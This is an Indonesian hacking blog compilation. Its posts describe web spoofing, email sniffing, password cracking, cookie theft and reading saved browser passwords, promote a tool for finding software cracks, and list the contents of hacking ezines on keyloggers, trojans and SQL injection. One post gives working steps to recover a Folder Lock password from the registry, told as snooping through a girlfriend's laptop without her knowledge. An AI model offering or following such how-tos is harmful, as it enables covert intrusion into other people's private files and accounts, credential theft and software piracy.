Masih ingat kasus pecurian Account sejumlah nasabah Bank BCA? Ya, itulah salah satu contoh nyata dari Web spoofing. Inti dari tehnik ini ialah dengan memanfaatkan kesalahan user saat mengetikkan alamat situs pada address bar. Pada dasarnya, Web Spoofing adalah usaha untuk menipu korban agar mengira dia sedang mengakses suatu situs tertentu, padahal bukan. Pada kasus bank BCA, pelaku membuat situs yang sangat mirip dan identik dengan situs aslinya sehingga sang korban yang terkecoh tidak akan merasa ragu mengisikan informasi sensitif seperti user name dan Passwordnya. Padahal, karena situs tersebut adalah situs tipuan, maka semua informasi berharga tadi terekam oleh webserver palsu, yaitu milik sang pelaku.
Menghadang email? Ya, dan sangat mudah untuk melakukan hal ini. Salah satu cara adalah dengan menggunakan mailsnarf yang terdapat pada utility dsniff. Cara kerja Mailsnarf adalah dengan menghadang paket data yang lewat di Internet dan menyusunnya menjadi suatu email utuh. Dsniff dan mailsnift merupakan software bekerja atas dasar WinPcap (setara dengan libcap pada Linux) yaitu suatu library yang menangkap paket-paket data. Paket-paket yang ditangkap ini akan disimpan dalam bentuk file oleh Windump, sedangkan Dsniff dan MailSnarf bertindak lebih jauh lagi yaitu menganalisa paket-paket data ini dan menampilkan password (dsniff) atau isi email (mailsnarf).
“Hacking while sleeping.” itulah ungkapan yang biasa dipakai oleh orang-orang yang melakukan password cracking. Mengapa? Karena pada umumnya dibuthkan waktu yang lama untuk melakukan pasword cracking. Bisa berjam-jam, bahkan berhari – hari! Semua itu tergantung dari target, apakah sang target menggunakan password yang umum, password memiliki panjang karakter yang tidak biasa, atau password memiliki kombinasi dengan karakter-karakter special. Salah satu software yang biasa digunakan untuk melakukan hal ini ialah dengan mengunakan Brutus, salah satu jenis software remote password cracker yang cukup terkenal. Brutus bekerja dengan teknik dictionary attack atau bruce-force attack terhadap port-port http, POP3,ftp, telnet, dan NetBIOS. Dictionary Attack bekerja dengan mencobakan kata-kata yang ada dalam kamus password. Sedangkan brute – force attack bekerja dengan mencobakan semua kombinasi huruf, angka, atau karakter. Brute Force Atack bekerja sangat lambat dan membutuhkan waktu yang lama tergantung dari jenis spesifikasi komputernya dan panjang karakter passwordnya. Saat ini telah banyak situs yang menutup akses terhadap akses terhadap usaha login yang secara terus-menerus tidak berhasil. Jika anda ingin melakukan password Cracking, silahkan pilih – pilih sendiri aplikasinya di halaman Member – spyrozone.net.
Session hijacking dewasa ini semakin marak dikalangan para attacker. Session Hijacking biasa dilakukan dengan melakukan peniruan cookies. Jadi pada intinya, kita harus bisa meniru cookies sang korban untuk mendapatkan sesi loginnya. Lalu bagaimana cara mendapatkan cookies sang korban?
1. Dengan analisa Cookies. Cara ini relatif sulit dilakukan.
2. Mencuri Cokies. Misalnya Sang Attacker ingin mendapatkan account si A. Sang Attacker bias dengan mudah membuat semacam script Java Script yang disisipkan dalam email untuk dikirim ke korban.Saat korban membuka email itu, tanpa sadar cookiesnya akan dicuri dan direkam ke suatu webserver dengan memanfaatkan suatu script PHP. Belakangan ini yang paling sering menjadi incaran adalah account Friendster. Ada yang menyisipkan suatu scipt lewat testimonial, ada yang menyisipkannya di profilnya sendiri untuk mencuri cookies sang korban dan lain sebagainya. Saya memiliki tips untuk ini:
1. Jangan menggunakan browser InternetExplorer saat ingin membuka profil orang lain. Catat alamat profil yang ingi anda lihat,logout terlebih dahulu dari account anda dan bersihkan semua cookies, baru kemudian bukalah profil Friendster tujuan.
2. Ketika menerima testimonial, periksa terlebih dahulu source codenya. Apakah disana terdapat script asing atau kata-kata yang identik dengan pembajakan seperti : “HACKED”, “DEFACED”, “OWNED”.. dll.. Jika ragu-ragu……. Reject ajah..
3. Waspada ketika tanpa suatu alasan yang jelas tiba-tiba anda logout dengan sendirinya dari account anda. Saat anda diminta memasukkan username dan password, lihat dulu addressbar anda! apakan anda sedang berada di situs yang semestinya atau tidak. Periksa source code halaman tersebut.Lihat pada form action, kemana informasi anda nantinya akan dikirim. Sebenarnya session hijacking bisa dicegah jika saja sang penyedia layanan memperhatikan hal-hal berikut:
a. Menetapkan session identifier yang unik
b. Menetapkan sistem identifier berpola acak
c. Session identifier yang independent
d. Session identifier yang bisa dipetakan dengan koneksi client side.
Kita bisa mengumpulkan informasi dengan menjadi proxy server bagi korban untuk dapat berselancar. Dengan menjadi proxy server, seluruh identitas sang peselancar bisa menjadi milik kita.
Memanfaatkan Kelalaian user dalam penggunaan fitur browser Setiap browser tentunya memiliki fitur yang ditujukan untuk kemudahan dan kenyamanan penggunanya dalam berselancar. Diantaranya ialah dengan adanya cache dan Password Manager. Di Internet tentunya banyak suatu website yang isinya tidak berubah dalam beberapa hari (Contohnya spyrozone.net nich.. hehehe Nah, untuk situs yang seperti ini cache menjadi hal yang sangat berguna. Cache akan menyimpan file-file hasil browsing sehinga nantinya jika anda berkunjung lagi ke situs tersebut browser tidakperlu lagi melakukan download untuk kedua kalinya dari server sehingga setiap halaman situs yang telah anda buka sebelumnya akan terbuka dengan lebih cepat. Semua itu biasanya diatur oleh header time to live. Lho, bagaimana dengan situs-situs penyedia berita yang selalu up to date? Untuk site yang seperti itu, time to live-nya akan di set=0 sehinga nantinya anda akan terus melakukan download setiap kali berkunjung. Cukup nyaman bukan? Ya, tapi ancaman mulai timbul. Cobalah kini anda jelajahi opsi-opsi yang berkaitan dengan cache pada browser anda. Tentu anda bias menemui bahwa ada fasilitas untuk menentukan berapa besarnya file temporary yang bisa disimpan di harddisk. Cari juga lokasi dimana file-file tersebut akan disimpan. Coba anda buka folder tersebut, anda akan menemui file-file html & file-file gambar dari site-site yang sudah anda kunjungi. Pada Browser IE, anda bias melihat lokasi file cache dengan menjelajahi menu Tools —> Internet options —> Settings Lalu apa yang bisa didapatkan?? toh cuma file-file “sampah”?? Hmm… sekarang coba anda copy semua file yang ada di sana ke suatu folder. Lalu bukalah salah-satu file htmlnya. Jika itu komputer publik,anda bisa mengetahui situs apa saja yang telah diakses oleh oleh orang sebelum anda. Hmm.. hanya dengan melihat file temporary anda bahkan bisa melihat password dan dll.Banyak saya temui situs yang menyimpan password dan menampilkannya pada url. Tentunya anda juga pasti sering membacanya di berbagai tutorial. Kebanyakan browser pada saat ini memiliki fasilitas untuk menyimpan password. Misalnya saat meggunakan Mozilla Firefox, anda pasti sering menerima kotak dialog konfirmasi yang menanyakan apakah anda ingin password anda disimpan atau tidak oleh PasswordManager.Kebanyakan user cenderung untuk memilih opsi YES, entah itu dengan penuh kesadaran atau memang mereka tidak tau ( baca: tidak mau tau) apa maksud dari kotak dialog itu. Orang lain yang kemudian mengunakan browser itu bisa dengan sangat mudah mendapatkan password korban dengan memasuki menu Tools —> Options —> Security –> Saved password. Contoh lain adalah fasilitas wand password yang dimiliki oleh browser Opera. Saat anda memasukkan user name dan password pada suatu form dan menekan tombol submit, opera secara default akan meminta konfirmasi kepada anda apakah anda ingin browser menyimpan id dan password anda atau tidak. Lagi dan lagi… kebanyakan netter ceroboh, mereka cenderung untuk memilih opsi “YES”. Lalu?? Orang lain yang kemudian menggunakan browser itu bisa melihat situs apa saja yang telah diakses oleh user, arahkan browser ke situs tersebut, letakkan cursor pada form isian user name, tekan [ALT]+[ENTER] dan BOOOMM!!!! Kenapa?? Jangan kaget dulu!! Hehehe.. form login akan otomatis terisi dengan user name korban lengkap dengan passwordnya.
Google.com.
Banyak sudah situs yang runtuh, password dan nomor – nomor kartu kredit yang dicuri akibat dari ulah orang yang menyalahgunaan kesaktiannya Dahulu, hal ini mudah dilakukan.Hanya dengan mengetikkan kata kunci tertentu yang berkaitan dengan user name dan password, anda bisa memanen ratusan password user melalui google. Tapi sekarang tampaknya anda harus gigit jari jika menggunakan cara diatas Jangan sedih dulu karena Google baru saja menelurkan produk barunya, yaitu Google Code Search. Ancaman baru mulai timbul, “si pintar” ini kini dapat meng-crawl hingga kepada archive file yang berada di public directory web server. Hati-hati yang punya kebiasaan untuk menyimpan informasi penting di dalamnya (password, dan info berharga lainnya) Sebaiknya mulai sekarang kebiasaan itu dihilangkan. Selalu proteksi folder-folder yang sensitif agar situs anda bisa hidup lebih lama. Kalo nggak… yach.. tunggu ajah ada orang yang memanfaatkan produk baru google ini untuk mengeruk informasi sensitive dari web server anda. dan jika itu sudah terjadi… maka bersiaplah.. “taman bermain” anda akan diambil alih olehnya..

gravatar

Jadi Cracker ATM Setelah Belajar di Internet


atmApakah ilmu yang anda daptkan dari dunia maya, akan anda gunakan untuk kejahatan atau hanya sebagai informasi atau untuk ambil manfaat positif? Pastinya, sebagian besar akan menjawab untuk mengambil manfaat positif bukan? Lain halnya dengan kejadian di Australia berikut ini :
Seorang pemuda yang bekerja di sebuah restoran pizza sukses meraup uang AU$30.000 atau sekitar US$27.700 (sekitar Rp 260 juta) dari sejumlah ATM. Tindak kejahatan tersebut dia pelajari dari internet. Bagaimana ceritanya?
Semuanya bermula, saat secara tidak sengaja pemuda bernama Brian Sommer tersebut menemukan sebuah petunjuk reparasi manual ATM di internet. Di dalamnya terdapatpassword default yang dapat digunakan untuk mengakses informasi di ATM model tertentu.
Penemuan tidak sengaja tersebut memunculkan niat jahat dalam diri pemuda 23 tahun ini. Pemuda Australia itu kemudian menggunakan informasi tersebut untuk mengakses hard disk di sejumlah ATM, mengutak-atiknya dan menggasak uang dari ATM tersebut.
Pertama kali beraksi, ia berhasil meraup uang sebesar AU$21.120. Kemudian, Sommer kembali beraksi di ATM lainnya, dan meraup AU$7.500. Untuk menjalankan aksinya, Sommer harus menggunakan kartu kredit nyata. Selama tujuh bulan ‘berpetualang’, Sommer menggunakan kartu kredit miliknya sendiri, pacarnya, ibunya, serta milik dua orang temannya.
Namun, sepandai-pandai tupai melompat, akhirnya jatuh juga. Itu pula yang dialami Sommer. Setelah sukses beberapa kali menggasak uang dari ATM, perbuatan jahatnya terendus polisi. Pihak pengadilan kemudian menjatuhkan hukuman berupa kerja sosial selama 100 jam serta masa percobaan selama dua tahun untuk Sommer. Selain itu, dia juga harus membayar sebesar AU$23.160 sebagai kompensasi.
Semoga, tidak ada yang meniru kreativitas si Sommer di dalam berselancar di dunia maya ya..

gravatar

Software Pencari Serial Number,Crack,Keygen

Ahaaaa ... Kalo kita mendownload sebuah software di internet,biasanya kalo software itu tidak bertuliskan freeware berarti software tersebut berbayar..untuk menggunakan semua feature didalamnya,kamu harus membeli software itu.biasanya si pembuat software akan memberikan demo terlebih dahulu.namanya "trial version".software demo biasanya memiliki batas waktu expired,kadang hanya diberi waktu 15 hari atau 30 hari.setelah masa waktu habis,otomatis software tersebut tidak bisa digunakan lagi.ada juga yang bisa digunakan selamanya,hanya saja ada beberapa fungsi(feature) penting yang di nonaktifkan.untuk mendaptakan versi penuhnya,kamu harus membeli software tersebut.

Setelah begini,kita akan kesel sendiri.padahal software tersebut sangat sangat kita butuhkan.Jalan satu satunya selain membelinya,kita harus mencari serial number,crack,keygen, registration code dari software tersebut.agar software itu bisa berubah dari demo menjadi full version.sebenarnya ada banyak web yang menyediakan serial number,crack,keygen, registration code.Tapi semua web yang menyediakannya,sangatlah beresiko karena bersisi bermacam macam virus.jika tidak hati hati,bisa bisa komputer kamu malah terkena virus.

supaya komputer kamu tak terserang virus saat sedang mencarinya,ada sebuah software pintar yang sangat sangat bisa membantu kamu dalam mencari serial number,crack,keygen, registration code.namanya Craagle(lucu ya namanya?hehehe) bisa kamu download disini

tenang saja software ini gratis kok dan ukurannya juga tidak terlalu besar.penggunannya sangat sederhana.cukup masukkan nama software yang ingin dicari lalu klik search.kamu bisa memilih mencari crack, serial atau cover cd, kemudian klik search.

mudah bukan?hehehe tapi ingat penggunaan software bajakan tuh ilegal.kasian doank pembuat softwarenya kalo kamu tidak beli...hehehehe

gravatar

Belajar Menjadi Hacker Dan Cracker Profesional

Penulis tidak bertanggungjawab atas penyalahgunaan artikel ini. Gunakanlah artikel ini dengan bijak. Resiko ditanggung sendiri. Artikel ini dibuat supaya tidak ada lagi orang indonesia yang melek dengan dunia underground (hacker dan cracker).


XCode ezine issue #1 (April 2006)
Daftar Isi :

1. Apakah Kamu hacker ? – Terjemahan oleh oleh ^rumput_kering^
2. Selamat datang disisi kami – Terjemahan oleh oleh ^rumput_kering^
3. KELEMAHAN PADA DEEP FREEZE STANDARD 5.20 TRIAL VERSION oleh ^rumput_kering^
4. Membuat deepfreeze trial menjadi full (hacking Deepfreeze) oleh Luckyy_man
5. Memeriksa keamanan webserver dengan NIKTO oleh ^family_code^
6. Menghubungkan internet melalui LAN dengan Windows XP oleh ^family_code^
7. Konfigurasi Windows Secara Manual Memakai Regedit oleh ^rumput_kering
8. Belajar membuat program penampil text dengan bahasa Assembler oleh ^family_code^
9. Belajar membuat program link website dengan Turbo Basic oleh ^family_code^
10. Belajar membuat program pilihan dengan Turbo Pascal oleh ^family_code^
11. Belajar membuat program tampil sederhana dengan C++ Builder oleh ^family_code^
12. Belajar membuat program kamus dengan C++ Builder oleh ^family_code^
13. Tips dan triks IRC oleh ^family_code^
14. Tehnik hacking local root on Fedore core 2 oleh dokter^cinta
15. Fungsi windows API oleh PushM0v
16. Diary.Exe, Apa dan Bagaimana? oleh PushM0v
17. Implementasi Teknik Stealth Pada Virus oleh PushM0v
18. Connect Back melalui Bug CGI oleh PushM0v



XCoe ezine issue #2 (Juni 2006)
Daftar Isi :

1. Sekilas cerita tentang Gempa di Yogya Oleh ^family_code^
2. UTAK-ATIK RESOURCE PROGRAM DENGAN MUDAH MENGGUNAKAN RESHACK oleh oleh ^rumput_kering^
3. OverClock VGA Card NVIDIA dengan RivaTuner oleh ^family_code^ -
4. Hacking Database Visual Foxpro oleh Capil
5. Membuat program sharing files dan folder dengan Visual Basic oleh ^family_code^
6. Melakukan Decompiler program Visual Basic dengan VbReFormer oleh ^family_code^
7. Panduan menggunakan YahooGroups untuk pemula oleh WoNX
8. Browsing Folder server tanpa fungsi cmd() oleh roninmorgue
9. SEARCHING ISI DATABASE MYSQL VIA PHP SCRIPT oleh roninmorgue
10. 10 Penipuan Terbanyak di Dalam Internet (terjemahan oleh ^rumput_kering^)
11. Waspadalah terhadap keylogger di warnet oleh ^family_code^
12. MySQL Exploit via PHP Script oleh roninmorgue
13. Cara menjual dan membeli E-Gold oleh Yooogy (Korido)
14. Instalasi CMS CuteNews untuk para Jurnalis oleh ^family_code^
15. Review selingan kopi anget oleh ^family_code^
16. Mengatasi Spyware secara darurat oleh ^family_code^
17. Review salah satu praktisi hacking (donatur hosting) oleh T-Koes
18 . Sekilas Biodata pada members Forum
19. Small IMS oleh roninmorgue
20. Serba-serbi Yogyafree Oleh ^family_code^

Download XCode Magazine No 2



XCode ezine issue #3 (Agustus 2006)
Daftar Isi :

1. Perjuangan komunitas di pertengahan tahun Oleh ^family_code^
2. Cara membuka akses keseluruhan dari database oleh DOKTER^CINTA
3. Membuat File Super Hidden oleh Yogie
4. Attack: Script Sanitasi Input oleh roninmorgue
5. Instalasi APACHE, PHP dan MySQL pada system WinXP Ver 1.1 oleh n0n4m3
6. Lupa sandi email Yahoo anda oleh masud WoNX
7. Belajar dasar Borland C++ Builder dengan 3 tutor oleh ^family_code^
8. Hack Website Shopping With shopupload.asp oleh m_beben
9. Profile Saben founder HitamPutihCrew oleh Saben
10. Prophile On Roninmorgue oleh roninmorgue
11. Profile Mbak Nita Si Progammer (PushM0v) oleh PushM0v (kata pengantar artikel oleh redaksi)
12. Deface with PHP Bugs oleh m_beben – Hal 48
13. Compilasi dengan LCC dan permasalahannya oleh ^family_code^
14. Mencari Alamat Target In One Hosting oleh m_beben
15. Teknik Mudah Cracking 4 Software Terbaru Dachshund Software Jerman oleh NeMeSiS_ByTe

Download XCode Magazine No 3



XCode ezine issue #4 (Oktober 2006)
Daftar Isi :

1. BaseCamp Yogyafree untuk semua members (Kurniawan / ^family_code^)
2. Mengakses Registry dari DOS Prompt (Jerry Maheswara)
3. Tutorial singkat AJAX untuk mempercepat akses situs (Tomero)
4. Mempercantik tampilan pada ufd (dylavig)
5. Auto Complete, Kemudahan atau Kerawanan??? (PusHm0v)
6. Gutbai.exe, Apa dan Solusinya (PusHm0v)
7. Teknik mudah cracking CD-Lock (UNTUK SEMUA VERSI!!!) buatan PC-Magic Software (NeMeSiS_ByTe)
8. Membuat Kaleng Bir Xcode dengan 3ds max6 (yulle)
9. Kelemahan Folder yang di lock Software Folder Accsess version : 2.0.0 (Abang Linuxer)
10. Mod_rewrite pada Apache (Muh Hasan Tanjung)
11. Koneksi Oracle With PHP (roninmorgue)
12. Cuplikan Gutbai4 (OPEN SOURCE) (Jerry Maheswara)
13. SSH Forwarding (sucks05)
14. Analisa Gutbai3 (Dony Wahyu Isp (DNA [eXTR!M])
15. Analisa Gutbai2 & Gutbai3 (BrainLessChild)
16. Mendisable account di win Xp(bernad_satriani / bl4ck_94m81t)
17. Membobol billing explorer versi 4.38 Stable (info-cyber_crime)

Download XCode Magazine No 4



XCode ezine issue #5 (Januari 2007)
Daftar Isi :

1. Kegiatan komunitas dalam beberapa bulan oleh ^family_code^
2. Instalasi Oracle10g di Linux RHELAS3 oleh Gugun Gunawan
3. Instalasi Web Server IIS oleh ^quick-sniffer^
4. Kehebatan PE Explorer, pemodifikasi file executable oleh SpicyCash
5. Memberi Logo Pada Properties My Computer oleh rose_see
6. Mencurangi (hampir) Semua Jenis Billing Warnet oleh BLiZBS Uchiha
7. Membuat web dengan AURA CMS oleh ^family_code^
8. Mengatur Sistem Komputer Tanpa Melalui Registry oleh bernad_satriani / bl4ck_94m81t
9. Cara Sederhana Proteksi File *.Exe Dari Virus [ Tanpa Anti Virus ] oleh bernad_satriani / bl4ck_94m81t
10. Seni Teknik Hacking Winrar v3.62 (All Versions 3.X) oleh NeMeSiS_ByTe
11. Mod_rewrite untuk wordpress oleh Muh Hasan Tanjung
11. XRemote (Trojan Dan Remoter PC Berbasis Windows) oleh poni
12. Ngekrek Game Princess Maker 2 Max-keZee
13. Membuat Bedug Lebaran Xcode Dengan 3ds Max 6 oleh yulle
14. Melakukan jebakan hacking friendster oleh ^family_code^

Download XCode Magazine No 5


XCode ezine issue #6 (April 2007)
Daftar Isi :

1. Demo Hacking Yogyafree oleh ^family_code^
2. Mengenal Hexadecimal, Binary dan ASCII oleh Capsoel OK
3. Honeypot oleh Capsoel OK
4. Animasi GIF Dengan Adobe Image Ready 7.0 oleh KanJoko
5. Membuat File Yang Mencurigakan oleh KanJoko
6. Tip Trik Animasi Marquee oleh KanJoko
7. Memodifikasi Aplikasi menggunakan PE Explorer dan Resource Hacker oleh FiSH A.K.A SpICY
8. ANIMASI MARQUEE DENGAN FRONTPAGE oleh KanJoko (KanXreeN)
9. Sending Fake SMS Number With Alpha oleh lEO_rETRo
10. Mengaktifkan program winamp secara otomatis pada saat LogOn oleh ~ConanZ~
11. Pemrograman Hack – Flooder – Open Digiblast oleh Poni
12. Chatting Mirc Via Handphone oleh orchard_road
13. MEMANFATKAN KELALAIAN ADMIN Pada xWin oleh achjun[at]gmail.com
14. Liputan Demo Hacking Yogyafree III oleh ^family_code^
15. Liputan Demo Hacking Yogyafree IV oleh ^family_code^

Download XCode Magazine No 6


XCode ezine issue #7 ( Juli 2007)
Daftar Isi :

1. Forum hacking terbesar di Indonesia oleh ^family_code^
2. Demo Hacking Yogyafree, Seminar Hacking Yogyafree dan lomba Hacking oleh ^family-code^
3. Pemrograman Hack Tool II Trojan -Open XRemote oleh poni
4. BERMAIN INTERNET DENGAN AMAN oleh Ane Minuz
5. Tip Trik Membuat Skin Winamp oleh KanXreeN
6. TUTORIAL CRACKING TRANSLATOR XP ENTERPRISE EDITION oleh Ane Minuz
7. TUTORIAL MEMBUAT SOFTWARE PORTABLE I oleh Ane Minuz
8. Password Cracking (Crack password dan channel IRC, Crack password windows komputer lokal, Panen password di dalam jaringan komputer, Passware Kit Enterprise vers.6.1, Crack password website, Social Engineering oleh Poni
9. Menembus proteksi ebook Studio KataKata oleh Max
10. [Tutorial] PHP injection! [+contoh SHELL] oleh Jack/Paman
11. Tips memilih hosting oleh masdapit
12. BOT Scanner [TOOL] + [TUTOR] + [FEATURE] oleh Jack/Paman
13. SIMPLY MANUAL CRACK FOR PLANET SOURCE CODE COMBO CD oleh KanXreeN
14. Liputan Seminar Hacking Yogyafree di JogjaTronik Mall ole ^family_code^
15. Liputan Demo Yogyafree V oleh ^family_code^
16. Liputan Pra Lomba Hacking (JogjaHAC 2007) oleh ^family_code^
17. Liputan Lomba Hacking (JogjaHAC 2007) oleh ^family_code^

Download XCode Magazine No 7


XCode ezine issue #8 (November 2007)
Daftar Isi :

1. 10 Tool favorit hacker dan pakar keamanan komputer tahun 2006 (poni)
2. Virtual box (Poni)
3. Merebut ADMIN Pada Sistem Operasi Windows (fuck-ri)
4. Menyiasati Firefox agar 20%-30% lebih cepat Tanpa Bantuan Software (^nuc_09^)
5. Menjebol Password PC Security tanpa ketahuan (^XmoenseN^)
6. Interview – Arif Wicaksono A.K.A sakitjiwa (poni)
7. Pemrograman HACK TOOL III (poni)
8. Membuat Tip of the Day saat logon (Rangga Putra Wiharja)
9. MEMBUAT ANTI VIRUS PADA FLASHDISK (^nuc_09^)
10. Digital Blaster.Internet & Network Flooder /Apa?/Bagaimana?/ (poni)
11. Info Game – I N F E R N A L (poni)
12. Membuat dynamic signature (IP signature) ^quick-sniffer^
13. Geeks Gadget Gallery

Download XCode Magazine No 8


XCode ezine issue #9 : Mei 2008
Daftar Isi :

1. Karya Anak Bangsa (poni)
2. XRemote vers. 2.0 (poni)
3. Transfer File Via Bluetooth Di Linux (poni)
4. Satu Halaman Untuk Membuat Program Pembaca Teks Dengan Visual Basic (poni)
5. Interview \\ y3dips \\ (poni)
6. Tutorial Spesial Cracking Software (poni/khiang)
7. Manual Crack Style Xp version 2.000000 (Sapta Ady Putra)
8. Pemrograman Hack Tool IV Process Killer #The Stupid Terminator# (YaDoY666)
9. Program sederhana Dengan Turbo Pascal 7.0 for DOS (Dark_Reiser)
10. Membuat Windows Menjadi Kota Mati (^XmoenseN^)
11. Mengubah Isi Regedit Yang Di Disable Admin!! (_Peri_Kecil_)
12. Mengubah Tampilan Internet Explorer (5un4rd0)13. Efek Animasi Teks Glow Dengan Adobe Flash (andankz)

Download XCode Magazine No 9



XCode ezine issue #10 : Agustus 2008
Daftar Isi :

1. Ubuntu 8.0.4 Hardy Heron (poni)
2. BeeTrap V.1.0 Honeypot pribadi untuk komputer anda (poni)
3. Bot Perl, DDOS dan mass Scanning Vuln (Newbee)
4. Mengubah format nilai textbox Secara massal (xBawahTanah)
5. Virus dengan VBS Generator (sayurganja)
6. Manual Cheat game Alien Shooter (poni)
7. Shutdown Komputer via Web menggunakan HTML+VB Script (HardyBoyz)
8. Membobol password PC Security tanpa masuk ke safe mode Menonaktifkan PC SECURITY All version 4.0 dan 6.0 (Hackers for love)
9. Cracking & Membuat Keygen untuk TestCodeWarrior (konohablueflash a.k.a jiromaru)
10. Mengamankan file penting dengan tangan kosong (^XmoenseN^)
11. Mengganti MAC Address Network Card dengan Macchanger (^Rumput-kering^)
12. Mengakali masa pakai Nitro PDF vers 5.3.3 dengan memodifikasi registry (poni)
13. Pemrograman Hack V Mouse Loncat (poni)
14. Membanjiri Pesan Ke Telepon Seluler Melalui Bluetooth (poni) hal.54
15. Resep Gado-Gado Special Solusi untuk mengatasi masalah Hacking-Cracking pada X Code 9 (deLaFoRta)
16. Cara Curang Cepat Drop Entrecard (Strife Leonhart)
17. Membuat Program Kamuflase Folder dengan Visual Basic (Shadow626)
18. Menambah & Menghapus Item pada Menu Klik Kanan File (Shadow626)

Download XCode Magazine No 10


XCode ezine issue #11 (November 2008)
Daftar Isi :

1. News Yogyafree Tegal Goes School (Mzloveme_as)
2. Tes Aplikasi Lunak Buatan Programmer Lokal (poni)
3. YF-CRYPT vers.1.0 – YogyaFree Binary EnCryption Engine (poni)
4. Wireless Hacking On Linux (Onno W. Purbo)
5. Manual Crack S40 Theme Studio 2.2 (Sapta Ady Putra)
6. Tips Mereset Kapasitas USB Flashdisk yang penuh (DNA[j4k])
7. Atasi Virus Antivirus Update & Indomuzic secara manual tanpa Antivirus (CyberCatZone)
8. Pemrograman Hack Tool VI , Port Scanner (poni)
9. Manual Cheat Game Alien Shooter II Vengeance (poni)
10. Cracking Audio Editor Pro Vers.2.9.5 (poni)
11. Intip Folder yang diproteksi dengan Folder Access Ver.2.0 (Hagakure)
12. Memunculkan kembali file Super Hidden (S3yama)
13. Hack DeeP Freeze 6 Forget Password (Tri Hajar)
14. X-Code Linux v0.0.2 (0×99 – JerryMaheswara)
15. Cracking Software pulsa Refill Master 239 (Abah)
16. Penggunaan IDM – Sites Grabber, Mengambil file dengan mudah di sebuah Website (X-Blast)
17. Bypassing Firewall Windows XP SP2 (poni)
18. Membobol Database Biling Explorer (blank_xys)
19. Blind SQL Injection (Abah)
20. Blind SQL Injection (Abah)
21. Dasar-Dasar Phising (Abah)
22. Membuka Semua Fitur Windows (^XmoenseN^)
23. Backdooring Target Dengan CONNECTBACK (vires)

Download XCode Magazine No 11


XCode ezine issue #12 (Februari 2009)
Daftar Isi :

1. YF-Keylogger vers.1.0 – Desi Dan Spyware (poni)
2. YF-KeyInMyFD vers.1.0 – Mengunci Komputer Dengan USB Flash Disk (poni)
3. Wawancara Dengan Bapak Onno Widodo Purbo (^rumput_kering^)
4. Cracking ASCII Art Maker 1.6 (cimble)
5. Mencegah Virus VBS berkembang biak (khiang)
6. Trik Membaca Password Untuk Software Folder Lock 5.7.5 (RaY-29)
7. Trik Reset Password Untuk Software Directory Security (RaY-29)
8. Pengunci Folder dengan Batch Programming (RAM.5nd)
9. Tampilan Desktop Lebih Atraktif Dengan JavaScript (RAM.5nd)
10. Mengubah Akses Limited Menjadi Administrator Pada Windows XP (Nd3s0)
11. Hacking / remote komputer dari jarak jauh (Dokter^Cinta)
12. Memoles Windows XP pada saat Logon (S3yama)
13. Curi Ebook Dengan Menggunakan Kekuatan Pikiran (Hagakure)
14. Spoonfed Hacking – How to Crack WEP (Progtel2004)
15. Pemrograman Hack Tool VII – Title Killer (poni)
16. Empat Langkah Mudah SQL Injection (Xshadow)
17. Menjalankan File Phyton Pada Hacked Server Sebagai Pengganti (Xshadow)
18. Mengubah Document Root pada Localhost (???)
19. Membuat Keylogger Sendiri (Dokter^Cinta)
20. Mengunci Windows ( ^XmoenseN^)
21. Membuat Program Management IP (^XmoenseN^)

Download XCode Magazine No 12

gravatar

belajar jadi hacker


Anda seorang hacker ? Atau anda bukan seorang hacker tetapi pingin menjadi hacker / cracker
dengan belajar cara menjadi seorang hacker yang bercita-cita menghacking website-website ternama / terkenal, atau ingin belajar membobol account bank. mencuri identitas kartu kredit / credit card, memporakporandakan blog / website milik
yahoo,google,microsoft,symantec,dll ? Tampaknya tidak perlu sampai berpikir terlalu muluk-muluk untuk menjadi pemenang, anda cukup bisa menghacking search engine, dan banyak teknik-teknik / ilmu hitam utk menghack search engine…
Sangat mudah sekali, dan banyak sekali website-website personal yang mengajarkan teknik itu, selain bebas dari masalah kriminal (karena hack search engine tidak sama dengan hacking tradisional), belajar menghacking google,yahoo,msn,dll juga sangat mengasyikkan, anda cukup mempelajari program seperti php atau perl ataupun asp, tidak perlu sampai belajar assembly atau c ataupun bahasa programming c++.
Salah satu teknik yang paling berbahaya adalah cloaking page, dimana anda bisa membuat search engine menjadi takluk kepada anda.
Jika teknik cloaking pages ini anda terapkan dan anda kombinasikan dengan sedikit potongan bahasa HTML alias kolaborasi sensasional yang mantap,
dengan memberikan sedikit META TAG noarchive, wow.. saya tidak bisa membayangkan bagaimana google akan bertekuklutut terhadap anda.
Saya sendiri pernah menerapkannya saat parked domain, dan memang sangat berbahaya sekali, revenue saya dari parked domain bisa mencapai 10 euro tiap domain,
coba bayangkan kalau anda mempunyai 50 domain ? Amazing..
Tetapi sekali lagi, saya tidak sarankan anda menjadi seorang penjahat, tetapi mungkin ini sedikit gambaran bagaimana menghack system jaringan tidak sama dengan hacking search engine.

gravatar

Membobol Folder Lock 5.7




Kita tentu punya file-file tertentu yang rahasia dan tidak ingin sembarang orang dapat melihat file-file tersebut. Seperti video porno, foto pacar, database perusahaan, dan lain-lain. Untuk itu diciptakanlah sebuah aplikasi untuk mengunci sebuah folder, Folder Lock namanya. Namun apakah Folder Lock itu aman?


Ada pengalaman menarik ketika saya memakai Laptop pacar saya. Saya menemukan Folder Lock di program yang sudah di-install. Eum.. Saya jadi penasaran, apa yang disembunyikan pacar saya dari saya. Setelah saya akali saya bisa tahu apa yang pacar saya simpan pada folder rahasianya.

Lalu bagaimana saya menembus proteksi Folder Lock? Penasaran?

Begini caranya…

1. Tekan kombinasi tombol ‘Windows+R‘ dan akan muncul fitur Run. Atau anda juga bisa membuka Run dengan klik Start > Run.
2. Dan ketik ‘regedit‘.
3. Telusuri path berikut ini HKEY_CURRENT_USER > Software > Microsoft > Windows > QualityControl.
4. Lihat!! Ada registy _pack dan lihat di value-nya.. Itu password lho…
5. Wait jangan buru-buru buka folder lock dulu.. Ceritanya password yang anda temukan itu di-encrypt.
6. Nah buat decrypt-nya saya coba rumus berikut A=B. Contoh password yang anda temukan ‘SBIBTJB‘ maka password aslinya adalah ‘RAHASIA‘. Saya harap anda mengerti.
7. Buka deh Folder Lock dan masukan password aslinya.
8. Binggo!!!

Tapi hati-hati jangan sampai yang punya tahu.. Kecuali atas izin yang punya..

Selamat Mencoba

gravatar

Cara Menyadap SMS Orang lain




